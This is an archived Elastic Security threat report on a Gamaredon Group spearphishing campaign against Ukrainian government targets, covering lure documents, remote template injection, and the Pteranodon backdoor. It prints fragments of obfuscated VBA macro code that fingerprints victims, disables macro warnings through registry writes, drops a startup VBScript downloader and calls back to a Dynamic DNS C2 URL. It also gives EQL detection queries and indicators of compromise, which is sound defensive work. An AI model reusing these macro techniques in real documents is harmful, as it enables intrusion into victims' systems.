{
	"id": "81a0dfca-8635-4ec5-8210-31e856fd3a3f",
	"created_at": "2026-04-06T00:08:14.53884Z",
	"updated_at": "2026-04-10T13:12:56.777003Z",
	"deleted_at": null,
	"sha1_hash": "efba480dd620ad7230886608631de2131fd524ba",
	"title": "Playing defense against Gamaredon Group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 627431,
	"plain_text": "Playing defense against Gamaredon Group\r\nBy Daniel Stepanic, Andrew Pease, Seth Goodwin, Elastic Security Intelligence \u0026 Analytics Team\r\nPublished: 2022-06-21 · Archived: 2026-04-05 19:17:52 UTC\r\nFor several months, the Intelligence \u0026 Analytics team at Elastic Security has tracked an ongoing adversary\r\ncampaign appearing to target Ukrainian government officials. Based on our monitoring, we believe Gamaredon\r\nGroup, a suspected Russia-based threat group, is behind this campaign. Our observations suggest a significant\r\noverlap between tactics, techniques, and procedures (TTPs) included within this campaign and public reporting [1].\r\nThis campaign has produced and deployed updated lures on a near-daily basis that appear to target multiple\r\nUkrainian government departments. With this high operational tempo and aggressive targeting, they consistently\r\nemploy a cluster of initial access techniques and procedures. Over the past four months, these techniques have\r\nconsisted of spearphishing, remote document template injection, startup folder persistence, VBA/VBScript\r\nlanguages, and Dynamic DNS command \u0026 control infrastructure.\r\nIn this post, we’ll walk through the campaign details, reviewing the implementation while also providing solutions\r\nsuch as detection strategies through the use of Elastic’s Event Query Language (EQL).\r\nCampaign Details\r\nThe earliest identified infrastructure indicates this campaign has been active since August 2019. The first sample\r\nleveraging this domain was submitted to VirusTotal in early September 2019. Spearphishing emails like the\r\nexample in Figure 1 (below) were used to deliver a malicious attachment and demonstrate Gamaredon Group’s\r\nattempt to impersonate an anti-corruption activist. 
This example targeted the National Security and Defense\r\nCouncil of Ukraine and dates to January 17, 2020.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 1 of 15\n\nFigure 1 - Spearphishing email sent to National Security and Defense Council of Ukraine\r\nA typical lure document might masquerade as an information request to the Ministry of Foreign Affairs of\r\nUkraine. These manufactured lures included official logos stolen from governmental offices of Ukraine and\r\nimpersonated diplomats known to their targets.\r\nFigure 2 - Lure document - Ministry of Foreign Affairs in Ukraine request\r\nTo improve their chances of success, they customize the request around the same date of the campaign and include\r\nurgent requests for action. These efforts are indicative of necessity.\r\nFigure 3 - Lure document - Information request related to NSDC Head of Ukraine\r\nOften, the call to action first required the victim to open an attached lure document. A user who attempted to open\r\none of these malicious attachments would see a perfectly convincing decoy document, while a sequence of\r\ninvisible actions occurred behind the screen. These documents end up leveraging a technique known as template\r\ninjection, a method of loading remotely hosted Microsoft Word document templates.\r\nMicrosoft Word objects function similarly to compressed archives and have properties defined using Microsoft’s\r\nOpen Office XML (OOXML) format. 
Within the decompressed word/_rels/ subdirectory, the file settings.xml.rels\r\ncontained a network location where a remotely hosted template was retrieved as depicted in Figure 4.\r\nFigure 4 - Excerpt from Settings.xml.rels\r\nEach external URL within these lures was configured to point to Dynamic DNS providers (ddns.net, hopto.org).\r\nDynamic DNS provides automation around updating a name server in the Domain Name System (DNS). Adopting\r\nthis technique shows the adversary’s attempt to mask their ownership and obscure atomic indicator\r\nassociations through the use of transient infrastructure, such as Dynamic DNS.\r\nFigure 5 - Word startup screen showing download of remote document template\r\nThe remote templates are macro-enabled, configured to execute VBA macro code that persists a VBScript object\r\nin the victim’s startup folder as a foothold. We assess that this initial code is used to identify the victim\r\nand to protect the second-stage payload that is intended only for their targeted victims. In the next sections, we\r\nwill review the document’s metadata and macro code found in a recent sample.\r\nDocument metadata analysis\r\nIn malicious campaigns, infrastructure is commonly created for specific targets. This serves multiple purposes, but\r\nfrequently it’s done to track implants and frustrate automated research and analysis. As analysts, this gives us\r\nsome insight into the adversaries’ maturity, experience, and resources. 
As an example, an adversary who reuses\r\nlure documents or templates may be less experienced, not interested in high-value targets, or using monetized\r\ninfrastructure from previous campaigns.\r\nAnalyzing the metadata from the lure document and template allows us to see when these weaponized documents\r\nwere created, as well as identify any associations between different elements of the campaign.\r\nAs we can see in Figure 6, the lure document was created on December 24, 2019 by the Author “ШУРИК”. In\r\nFigure 7, we can see that the Author is the same as observed in the lure document (ШУРИК). Additionally, we can\r\nsee that the remote template was created on December 12, 2019 and then modified on December 24, 2019. There\r\nwere 5 modifications to it, indicating that it has been used for 5 campaigns in 12 days — or about 2.5 days per\r\ncampaign. With moderate confidence, this tells us that the remote template is likely reused and updated with new\r\nmacros for new campaigns, and that they were created by the same Author (or at a minimum, the same instance of\r\nMicrosoft Word).\r\nAs an analyst note, we see different tool markings that indicate this was created by a Russian speaker (Russian\r\nAuthor, Russian Language Code, Cyrillic character set, and the usage of Reanimator Extreme Edition). While we\r\ncan use those as information to help inform overall analysis, this information can be seeded — so it doesn’t prove\r\nanything definitively on its own. 
In this case, this aligns with other open source analysis linking this to the\r\nGamaredon Group, which is believed to be Russian in origin.\r\nFile Size 46 kB\r\nFile Type Extension docx\r\nMIME Type application/vnd.openxmlformats-officedocument.wordprocessingml.document\r\nLast Modified By ШУРИК\r\nRevision Number 2\r\nCreate Date 2019:12:24 15:58:00Z\r\nModify Date 2019:12:24 16:10:00Z\r\nTemplate pos.dot\r\nTotal Edit Time 2 minutes\r\nPages 1\r\nWords 195\r\nCharacters 1114\r\nApplication Microsoft Office Word\r\nLines 9\r\nParagraphs 2\r\nCompany Reanimator Extreme Edition\r\nCharacters With Spaces 1307\r\nFigure 6 - Metadata from the lure document (truncated for length)\r\nFile Size 44 kB\r\nFile Type Extension doc\r\nMIME Type application/msword\r\nLanguage Code Russian\r\nAuthor ШУРИК\r\nTemplate pos.dot\r\nLast Modified By ШУРИК\r\nSoftware Microsoft Office Word\r\nCreate Date 2019:12:12 11:48:00\r\nModify Date 2019:12:24 10:30:00\r\nCode Page Windows Cyrillic\r\nCompany Reanimator Extreme Edition\r\nChar Count With Spaces 0\r\nRevision Number 5\r\nTotal Edit Time 0\r\nWords 0\r\nCharacters 0\r\nPages 1\r\nParagraphs 1\r\nLines 1\r\nFigure 7 - Metadata from the remote template (truncated for length)\r\nWhile we cannot state with any authority, searching for the Author “ШУРИК” has identified similar TTPs (lure\r\ndocuments with remote template injection) as far back as September of 2019.\r\nMacro code analysis\r\nThe macro code was obfuscated using string concatenation and procedurally generated variables — techniques\r\nthat are often used to bypass static detection technologies. Upon execution, this code provides reverse shell\r\nfunctionality that allows an adversary access to the victim’s system and the capability to access shared resources on\r\ntheir local network. 
Figure 8 contains an excerpt of the macro that depicts the creation of a reverse shell and some\r\nof the system information collected automatically.\r\nDim NoARzTHy\r\nNoARzTHy = \"Set WShell=CreateObject(\"\"WSc\" + \"ri\" + \"pt.S\" + \"hel\" + \"l\"\")\"\r\nSet PWFJWatF = CreateObject(\"WScr\" + \"ipt.Ne\" + \"two\" + \"rk\")\r\nDim pbuvwTLK, JzESywut\r\nSet GGZucIZE = CreateObject(\"Sc\" + \"rip\" + \"ting.Fi\" + \"leSy\" + \"stemOb\" + \"ject\")\r\npbuvwTLK = GGZucIZE.Drives(Environ(\"Syst\" + \"emDri\" + \"ve\")).SerialNumber\r\nOYTgBXAP = PWFJWatF.ComputerName\r\nFigure 8 - First 7 lines of macro code from the loaded document template\r\nFigure 9 shows an excerpt of the same code with the concatenation removed (the doubled quotes are VBA's escape for a literal quote inside a string).\r\nDim NoARzTHy\r\nNoARzTHy = \"Set WShell=CreateObject(\"\"WScript.Shell\"\")\"\r\nSet PWFJWatF = CreateObject(\"WScript.Network\")\r\nDim pbuvwTLK, JzESywut\r\nSet GGZucIZE = CreateObject(\"Scripting.FileSystemObject\")\r\npbuvwTLK = GGZucIZE.Drives(Environ(\"SystemDrive\")).SerialNumber\r\nOYTgBXAP = PWFJWatF.ComputerName\r\nFigure 9 - First 7 lines of macro code - Removal of concatenation\r\nThe serial number and hostname of the victim's computer are some of the first pieces of information the VBA\r\ncollects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the\r\nimplant and the victim. 
Figure 10 shows the configuration of the URI request within the macro and Figure 11\r\nrepresents an example URI.\r\nJzESywut = \"h\" + \"tt\" + \"p:\" + \"//l\" + \"ibcr\" + \"ash.dd\" + \"ns.ne\" + \"t/\" \u0026 OYTgBXAP \u0026 \"_\" \u0026 HFzesifc \u0026 \"//po\"\r\nFigure 10 - URI request configuration - Macro\r\nJzESywut = hxxp://libcrash.ddns[.]net/ENDPOINT1_96L02G3D//posolreboot.php\r\nFigure 11 - URI request configuration - Example\r\nBy default, Microsoft disables external or untrusted macros by setting key values in the registry at\r\nHKCU\\Software\\Microsoft\\Office\\(VERSION)\\Word\\Security. The first registry modification made by this macro\r\nchanges the key value of AccessVBOM to 1, effectively bypassing the default setting to enable external or\r\nuntrusted macros. The second registry modification enables all macros automatically and disables warnings for\r\nfuture macro-enabled objects. Figure 12 represents the macro code for these registry modifications.\r\nFEDzCjgi$ = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" \u0026 Application.Version \u0026 _\r\n\"\\Word\\Security\\\"\r\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ \u0026 \"AccessVBOM\", 1, \"REG_DWORD\"\r\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ \u0026 \"VBAWarnings\", 1, \"REG_DWORD\"\r\nFigure 12 - Registry modifications found in macro\r\nThe remaining lines of code end up writing a VBScript file and placing it in the user’s startup directory. 
Figure 13\r\ncontains an excerpt of the beginning lines of macro code where the VBScript (security.vbs) is written to disk and\r\nplaced in the startup folder.\r\nDim LISPVdZd As Object\r\nSet LISPVdZd = GGZucIZE.CreateTextFile(FESHWDaD + \"\\Mi\" + \"croso\" + \"ft\\Wi\" + \"ndow\" + \"s\\St\" + \"art Men\" + \"u\\P\r\nFigure 13 - Macro code writing VBScript file (security.vbs)\r\nUpon rebooting or successfully authenticating to an infected system, the persistent VBScript file is automatically\r\nexecuted and a standard HTTP GET is made with the previously observed URI (Figure 14). If the request is\r\nsuccessful, the response body gets stored into another variable. This functionality appears to serve as a\r\ndownloader that has specific subroutine instructions for reassembling a binary on disk. Figure 14 contains an\r\nexcerpt of the function used to construct the HTTP GET request.\r\nFunction TOGeMFBD(iWotBBKf)\r\nOn Error Resume Next\r\nSet EXJJrRlN = CreateObject(\"MSXML2.XMLHTTP\")\r\nWith EXJJrRlN\r\n.Open \"GET\", iWotBBKf, False\r\n.send\r\nEnd With\r\nIf EXJJrRlN.Status = 200 Then\r\nTOGeMFBD = EXJJrRlN.ResponseBody\r\nEnd If\r\nEnd Function\r\nFigure 14 - GET request (security.vbs)\r\nDuring dynamic analysis, analysts identified that the script enters a loop while sending the request. A 0-byte file is\r\ncreated under the infected user’s roaming profile with a procedurally generated file name and text file extension.\r\nThe file is iteratively written and deleted without the contents changing.\r\nAnalysts have not confirmed the purpose of this file, and suspect it is used to reassemble a segmented later-stage\r\nimplant. 
Potential reasons to obfuscate this process include evading detection and response solutions.\r\nPteranodon update\r\nWhile doing this research, we observed samples and artifacts that appear to be related to an updated version of the\r\nGamaredon Group’s custom backdoor, known as Pteranodon. Although we don’t have substantial evidence that\r\nPteranodon is the final payload victims are infected with during this campaign, we assess with moderate\r\nconfidence that this activity is linked to Gamaredon Group.\r\nThree PE samples were uploaded to VirusTotal last month with each dropping two text files (ExcelMyMacros.vba,\r\nwordMacros.vba). The two text files share several similarities to the VBA macro code found in the remote\r\ntemplates used in this campaign — specifically, the methods of retrieving and hex-encoding the serial number and\r\nsimilar subroutine logic. Figure 15 depicts the VBA macro code from the remote template on the left and the\r\ndropped VBA macro code from a known Pteranodon implant on the right.\r\nVBA from Campaign\r\nFor LfJesrvH = 0 To UBound( IvAPFGDD )\" + vbCrLf\r\nLISPVdZd.Write \"IvAPFGDD(LfJesrvH) = Asc( Mid( EaCJFwPc, LfJesrvH + 1, 1 ) )\" + vbCrLf\r\nLISPVdZd.Write \"Next\" + vbCrLf\r\nLISPVdZd.Write \"GetFEDzCjgi = IvAPFGDD\" + vbCrLf\r\nVBA from Pteranodon\r\nFor i = 0 To UBound( asrrCodes )\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" asrrCodes(i) = Asc( Mid( myPassPhrase, i + 1, 1 ) )\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" Next\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" GetKey = asrrCodes\" + vbCrLf\r\nFigure 15 - Macro comparison - VBA from Campaign (top) vs VBA from Pteranodon (bottom)\r\nBoth text files contained VBA, and had the same functionality for disabling macro warnings, creating a persistent\r\nVBScript in the startup folder and establishing connections to C2. 
What’s interesting with the dropped text files\r\n(VBA) is that they show the true variable names used by the developers before their tooling obfuscates the\r\nvariables. At the time of this writing, each of the four C2 servers (see attached indicators) affiliated with\r\nPteranodon samples was active and hosted in a network allocated to ASN9123 (TIMEWEB LTD). Macro\r\ncode associated with the Gamaredon Group campaign targeting Ukrainian officials called back to C2 hosted in\r\nthe same network.\r\nAn interesting change in some of these artifacts appears to be the adoption of .NET. Along with the two text files\r\ncontaining VBA code, there are three dropped DLLs (Microsoft.Office.Interop.Excel.dll,\r\nMicrosoft.Office.Interop.Word.dll, Microsoft.Vbe.Interop.dll) and a .NET sample showing dependencies with\r\nthese files. Figure 16 shows a hex-encoded reference to one of the VBA files (wordMacros.txt). Based on these\r\nobservations, it’s intriguing to see Gamaredon Group continue to leverage core functionality of their VBA stager\r\ncode, but in a new method of execution by using .NET.\r\nFigure 16 - .NET reference to “wordMacros.txt”\r\nDetection crafting\r\nFor organizations interested in detecting TTPs discussed in this blog post, detection logic has been provided for\r\nthe following categories:\r\nDynamic DNS\r\nDynamic DNS enables adversaries to rapidly provision very large numbers of records that map back to their\r\ninfrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used\r\nDynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate\r\ninfrastructure for hosting stagers and templates.\r\nProfiling Dynamic DNS for your enterprise is an amazing way to get started hunting — not just to baseline and\r\nbuild environmental awareness, but also to outright find evil. 
We will primarily focus on the two Dynamic DNS\r\nproviders observed in relation to this campaign. If you need inspiration, consider counting up all non-browser\r\nprocesses that made a DNS request to one of these Dynamic DNS providers as shown in Figure 17.\r\ndns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\") and\r\nprocess_name not in (\"chrome.exe\", \"iexplore.exe\", \"firefox.exe\")\r\n| count process_name, query_name\r\nFigure 17 - EQL Query - Count of non-browser process to dynamic DNS providers\r\nAnother option examines the processes that most frequently communicate with these providers, and may provide\r\nmore context regarding how dynamic DNS is used in your environment, or enable an analyst to find signs of other\r\nmalicious activity.\r\nnetwork where event of\r\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]\r\n| count process_name, total_in_bytes, total_out_bytes\r\nFigure 18 - EQL query - Network traffic of processes to dynamic DNS providers\r\nTemplate Injection\r\nSpearphishing attachments that utilize template injection may bypass security controls because they contain no\r\nembedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code\r\nresides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols\r\n(HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need\r\nto whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft\r\ninfrastructure. 
Below is an example EQL query focused on new process creation events from Office products that\r\nalso made DNS requests outside our whitelist.\r\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[dns where not wildcard(query_name, \"*.microsoft.com\", \"*.skype.com\")]\r\nFigure 19 - EQL query - DNS traffic from Office applications\r\nSome enhancements we can make to the previous query are to add a network event to the sequence and to look\r\nfor a spawned child process, bringing more context into the detection.\r\nsequence\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")] by unique_pid\r\n[dns where not wildcard(query_name, \"*.microsoft.com\", \"*.skype.com\")] by unique_pid\r\n[network where true] by unique_pid\r\n[process where subtype.create] by unique_ppid\r\nFigure 20 - EQL query - Network traffic making dynamic DNS requests from Office applications\r\nIf we wanted to tailor a sequence-based detection to the Gamaredon Group activity specifically, we can bring in\r\nthe previous Dynamic DNS providers, which creates a more restrictive filter.\r\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[network where event of\r\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]]\r\nFigure 21 - EQL query - Network traffic making dynamic DNS requests from Office applications\r\nAcross a range of features provided by the Elastic Endpoint, this attack is prevented through different machine-learning technologies to stop advanced threats such as macro-enabled documents and malicious binaries. 
Along\r\nwith these protections, we can take nearly any EQL logic and deploy it in prevention mode to completely stop an\r\nattack such as in this example with the download and execution of the remote template. Here’s a short clip in\r\naction:\r\nMalicious registry configuration\r\nIn order for adversaries to be effective in their mission, they often create their own opportunities. In this case, the\r\nadversary reconfigured the target endpoint in order to disable macro security warnings and trust future macros\r\nautomatically. These small changes can end up having larger implications, and defenders can look for them as\r\nsymptoms of more serious security issues. For example, these same techniques have also been associated with\r\nthreat groups like APT32 and are leveraged by malware families such as AgentTesla and BabyShark.\r\nThis query looks for evidence of the registry modifications that disable warnings for macros and automatically\r\nenable future macros:\r\nregistry where registry_data == 1 and wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")\r\nFigure 22 - EQL query - Registry modifications around disabling macro security features\r\nThat would function perfectly well as a standalone detection, but EQL allows us to look for both the registry\r\nmodification and template injection techniques in this example query:\r\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[registry where registry_data == 1 and wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\r\n[registry where registry_data == 1 and 
wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\r\nFigure 23 - EQL query - Registry modifications around disabling macro security features\r\nPersistence startup\r\nGamaredon Group leveraged both malicious Windows shortcut files and script objects written to the Startup folder\r\nfor persistence. This technique is very effective in spite of its simplicity and continues to be popular among\r\nadversaries. One of the first places to start building detection logic would be to inquire about processes that write\r\nfiles to the startup folder.\r\nfile where subtype.create\r\nand (\r\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.lnk\" or\r\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"\r\n)\r\n| count process_name, file_path, user_name\r\nFigure 24 - EQL query - Monitoring file writes to startup folder\r\nTo take it a bit further, we can also customize detection logic to include the VBScript execution at logon. This is a\r\ngreat example for building a sequence-based signal, as we will track the adversary’s activity over an extended\r\nperiod of time — such as 90 days. Once the machine is rebooted or the user logs back in, an alert can be generated\r\nwhen WScript executes the VBScript file at startup.\r\nsequence with maxspan=90d\r\n[file where subtype.create and file_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"]\r\n[process where subtype.create and parent_process_name == \"explorer.exe\" and\r\nprocess_name == \"wscript.exe\" and command_line == \"*\\\\Programs\\\\Startup\\\\*\"]\r\nFigure 25 - EQL query - Monitoring execution of startup processes\r\nConclusion\r\nIn this post, we reviewed recent campaign TTPs tied to an adversary known publicly as Gamaredon Group. This\r\ngroup is likely to have been active since at least 2013 and has engaged in an ongoing campaign against Ukraine at\r\nthe time of this writing. 
We highlighted some of their current techniques such as template injection and the use of\r\nDynamic DNS providers, the macro code found in a recent sample, and updates to their custom backdoor known\r\nas Pteranodon. By using EQL, we also shared hunting and detection strategies around four specific techniques\r\nused by Gamaredon Group.\r\nWe hope that by sharing some of these insights and queries, we can help raise awareness and continue to focus on\r\nprotecting the world's data from attacks. To enable organizations further, we’ve added all the Indicators of\r\nCompromise (IOCs) below and added the queries in this post into the EQLLib repository.\r\nInterested in using Elastic Security? Try Elastic SIEM for free.\r\nPlus, EQL support is being added to Elasticsearch!\r\nIndicators of Compromise (IOCs)\r\nLure Document SHA-256 86e0701349903105b0c346df9485dd59d85dd9463c2bee46d974ea1b1d7059d4\r\nRemote Template (pos.dot) SHA-256 feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f\r\nRemote Template from Lure Document Domain document-out[.]hopto[.]org/pos[.]dot\r\nRemote Template Hosting IP 141[.]8[.]195[.]60\r\nRemote Template Hosting IP 141[.]8[.]192[.]153\r\nSystem Information Upload IP 188[.]225[.]25[.]50\r\nSystem Information Upload URI libcrash.ddns[.]net/{Computername_SerialNumber}//posolreboot.php\r\nExcelMyMacros.vba SHA-256 c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e\r\nwordMacros.vba SHA-256 02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d\r\nExcelMyMacros.txt SHA-256 2f310c5b16620d9f6e5d93db52607f21040b4829aa6110e22ac55fab659e9fa1\r\nPteranodon SHA-256 c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f\r\nPteranodon SHA-256 145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd\r\nPteranodon Domain 
beercraft[.]space\r\nPteranodon Domain skymage[.]fun\r\nPteranodon Domain masseffect[.]space\r\nPteranodon Domain masseffect[.]website\r\nPteranodon IP 185[.]200[.]241[.]88\r\nPteranodon IP 188[.]225[.]46[.]94\r\nReferences\r\n1. https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine\r\nSource: https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/blog/playing-defense-against-gamaredon-group"
	],
	"report_names": [
		"playing-defense-against-gamaredon-group"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434094,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.pdf",
		"text": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.txt",
		"img": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.jpg"
	}
}